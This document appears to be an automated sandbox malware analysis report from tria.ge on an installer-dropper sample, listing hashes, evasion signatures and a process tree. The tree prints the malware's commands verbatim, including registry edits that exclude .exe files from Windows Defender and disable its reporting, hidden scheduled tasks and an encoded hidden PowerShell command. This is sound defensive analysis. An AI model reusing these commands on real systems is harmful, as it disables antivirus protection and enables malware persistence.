Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
130s -
max time network
108s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
26/10/2022, 12:33
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
file.exe
Resource
win10v2004-20220812-en
General
-
Target
file.exe
-
Size
7.2MB
-
MD5
4c3bf9f44cb3b0beafd4fdbe47a64eeb
-
SHA1
fc3dfad3a7e2197857a94514a186bfcfeeaf6b00
-
SHA256
324edc8acd355934c63a1fcaa6c4793d681302fa49d4f5233eaeafdc366e34ab
-
SHA512
36cacdb10d8da5f6c5fbf0c176db314cfb23ff15154f95d3a07038e191ffeece9467feed41a3294a25797937d5ce60c197fc0ca554895b54c68381f261ec4622
-
SSDEEP
196608:91O/pWMv3UnNQzQSlz+qCpqFWoYICsTs7YT5OS++5TM8pPwGt:3OxWRnN7SYZIjTsq5OSw2t
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 4248 Install.exe 3668 Install.exe -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation Install.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\bKFjthDDlmdmBdSpYV.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1352 schtasks.exe 816 schtasks.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1844 powershell.EXE 1844 powershell.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1844 powershell.EXE -
Suspicious use of WriteProcessMemory 44 IoCs
description pid Process procid_target PID 1492 wrote to memory of 4248 1492 file.exe 79 PID 1492 wrote to memory of 4248 1492 file.exe 79 PID 1492 wrote to memory of 4248 1492 file.exe 79 PID 4248 wrote to memory of 3668 4248 Install.exe 80 PID 4248 wrote to memory of 3668 4248 Install.exe 80 PID 4248 wrote to memory of 3668 4248 Install.exe 80 PID 3668 wrote to memory of 2548 3668 Install.exe 82 PID 3668 wrote to memory of 2548 3668 Install.exe 82 PID 3668 wrote to memory of 2548 3668 Install.exe 82 PID 3668 wrote to memory of 3104 3668 Install.exe 84 PID 3668 wrote to memory of 3104 3668 Install.exe 84 PID 3668 wrote to memory of 3104 3668 Install.exe 84 PID 2548 wrote to memory of 3324 2548 forfiles.exe 86 PID 2548 wrote to memory of 3324 2548 forfiles.exe 86 PID 2548 wrote to memory of 3324 2548 forfiles.exe 86 PID 3324 wrote to memory of 4264 3324 cmd.exe 87 PID 3324 wrote to memory of 4264 3324 cmd.exe 87 PID 3324 wrote to memory of 4264 3324 cmd.exe 87 PID 3104 wrote to memory of 4572 3104 forfiles.exe 88 PID 3104 wrote to memory of 4572 3104 forfiles.exe 88 PID 3104 wrote to memory of 4572 3104 forfiles.exe 88 PID 3324 wrote to memory of 3380 3324 cmd.exe 89 PID 3324 wrote to memory of 3380 3324 cmd.exe 89 PID 3324 wrote to memory of 3380 3324 cmd.exe 89 PID 4572 wrote to memory of 4928 4572 cmd.exe 90 PID 4572 wrote to memory of 4928 4572 cmd.exe 90 PID 4572 wrote to memory of 4928 4572 cmd.exe 90 PID 4572 wrote to memory of 4832 4572 cmd.exe 91 PID 4572 wrote to memory of 4832 4572 cmd.exe 91 PID 4572 wrote to memory of 4832 4572 cmd.exe 91 PID 3668 wrote to memory of 1352 3668 Install.exe 92 PID 3668 wrote to memory of 1352 3668 Install.exe 92 PID 3668 wrote to memory of 1352 3668 Install.exe 92 PID 3668 wrote to memory of 3448 3668 Install.exe 94 PID 3668 wrote to memory of 3448 3668 Install.exe 94 PID 3668 wrote to memory of 3448 3668 Install.exe 94 PID 1844 wrote to memory of 3548 1844 powershell.EXE 98 PID 1844 wrote to memory of 3548 1844 powershell.EXE 98 PID 3668 wrote to memory of 1816 3668 Install.exe 103 PID 3668 wrote to memory of 1816 3668 Install.exe 103 PID 3668 wrote to memory of 1816 3668 Install.exe 103 PID 3668 wrote to memory of 816 3668 Install.exe 105 PID 3668 wrote to memory of 816 3668 Install.exe 105 PID 3668 wrote to memory of 816 3668 Install.exe 105
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1492 -
C:\Users\Admin\AppData\Local\Temp\7zS6C8A.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4248 -
C:\Users\Admin\AppData\Local\Temp\7zS7053.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:3668 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:2548 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:3324 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:4264
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:3380
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:3104 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:4572 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:4928
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:4832
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gSmiMIuyi" /SC once /ST 13:00:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:1352
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gSmiMIuyi"4⤵PID:3448
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gSmiMIuyi"4⤵PID:1816
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bKFjthDDlmdmBdSpYV" /SC once /ST 14:35:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\LcMDsXLSmMLmtBGQR\VXuqdfXGxZocYTe\VvVnnyM.exe\" JF /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:816
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1844 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:3548
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:3432
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4060
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1136
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6.3MB
MD53e2c486c6b397a3c96c5ae6c30de7924
SHA1beafeb2d21677cb2183f250812051fbc75527f4e
SHA2568dfdd352c3a42b7dd091b213852833a80cb62736948221b3300f571e353d676f
SHA512541ddbb71bb2e86b69cf637fbcc0f87417189fee4f60f2b67799476f2f858fa847d44c5e4f6ea15aa9f07b589210f68a5ab565f531f81ef9fab2071a535f2393
-
Filesize
6.3MB
MD53e2c486c6b397a3c96c5ae6c30de7924
SHA1beafeb2d21677cb2183f250812051fbc75527f4e
SHA2568dfdd352c3a42b7dd091b213852833a80cb62736948221b3300f571e353d676f
SHA512541ddbb71bb2e86b69cf637fbcc0f87417189fee4f60f2b67799476f2f858fa847d44c5e4f6ea15aa9f07b589210f68a5ab565f531f81ef9fab2071a535f2393
-
Filesize
7.0MB
MD58c94340110f911923720019e038dbc4d
SHA1534f1f1415337ac1147881432930c35a25206735
SHA256e726dff33704003648f7aa836abf4557b812dee36908ec55366d882a51ee0dad
SHA5128accf7ee26fa9ac60ac4dd89152756f420ea06eba035a9b6782c05f14366f82ca76bec84a54a853071f34b1bc36bd1c31887656a06e378a487e7fe066c476fba
-
Filesize
7.0MB
MD58c94340110f911923720019e038dbc4d
SHA1534f1f1415337ac1147881432930c35a25206735
SHA256e726dff33704003648f7aa836abf4557b812dee36908ec55366d882a51ee0dad
SHA5128accf7ee26fa9ac60ac4dd89152756f420ea06eba035a9b6782c05f14366f82ca76bec84a54a853071f34b1bc36bd1c31887656a06e378a487e7fe066c476fba